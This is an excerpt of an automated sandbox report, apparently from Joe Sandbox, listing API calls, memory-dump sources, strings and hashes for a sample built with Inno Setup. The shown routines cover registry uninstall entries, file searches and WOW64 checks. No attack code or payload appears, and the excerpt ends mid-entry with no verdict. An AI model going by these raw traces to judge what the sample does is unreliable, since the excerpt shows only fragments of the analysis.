• LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
  • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
  • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
  • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
  • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
  • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
  • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
  • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
  • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
  • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
• GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212FC4C,02131944,?,?,02131974,?,?,021319C4,?), ref: 004683FD
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
  • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
Strings
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
• String ID: $(Default)$STOPIMAGE$%H
• API String ID: 3231140908-2624782221
• Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
• Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
• Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
• Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
• FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
• FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
Strings
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: unins$unins???.*
• API String ID: 3541575487-1009660736
• Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
• Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
• Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
• Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
• GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: ErrorFileFindFirstLast
• String ID:
• API String ID: 873889042-0
• Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
• Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
• Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
• Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
APIs
• GetVersion.KERNEL32(00000388,0046E17A), ref: 0046E0EE
• CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,00000388,0046E17A), ref: 0046E10A
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: CreateInstanceVersion
• String ID:
• API String ID: 1462612201-0
• Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
• Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
• Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
• Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
• Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
• Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
• Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
• Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
APIs
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
• Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
• Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

Control-flow Graph

• Executed
• Not Executed
                                                                                            APIs
                                                                                              • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                              • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$Close
                                                                                            • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                            • API String ID: 3391052094-3342197833
                                                                                            • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                            • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                            Control-flow Graph

                                                                                            (rendered control-flow graph not reproduced; entry block 492848-49287c, exit block 492d22-492d3c)
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindSleepWindow
                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                            • API String ID: 3078808852-3310373309
                                                                                            • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                            • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                            Control-flow Graph

                                                                                            (rendered control-flow graph not reproduced; entry block 483a7c-483aa1, exit block 483b4d-483b52)
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                            • API String ID: 2230631259-2623177817
                                                                                            • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                            • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                            Control-flow Graph

                                                                                            (rendered control-flow graph not reproduced; entry block 468d88-468dc0, exit block 468fa2-468fbc)
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                            • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                            • Inno Setup: No Icons, xrefs: 00468E73
                                                                                            • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                            • Inno Setup: App Path, xrefs: 00468E4A
                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                            • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                            • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                            • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                            • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                            • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                            • %s\%s_is1, xrefs: 00468E05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1093091907
                                                                                            • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                            • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                              • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                            • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                              • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 3771764029-544719455
                                                                                            • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                            • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                            Control-flow Graph

                                                                                            (rendered control-flow graph not reproduced; entry block 423874-42387e, exit block 4239a7-4239ab)
                                                                                            APIs
                                                                                              • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                            • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                            • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                            • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                            • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                            • String ID: |6B
                                                                                            • API String ID: 183575631-3009739247
                                                                                            • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                            • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
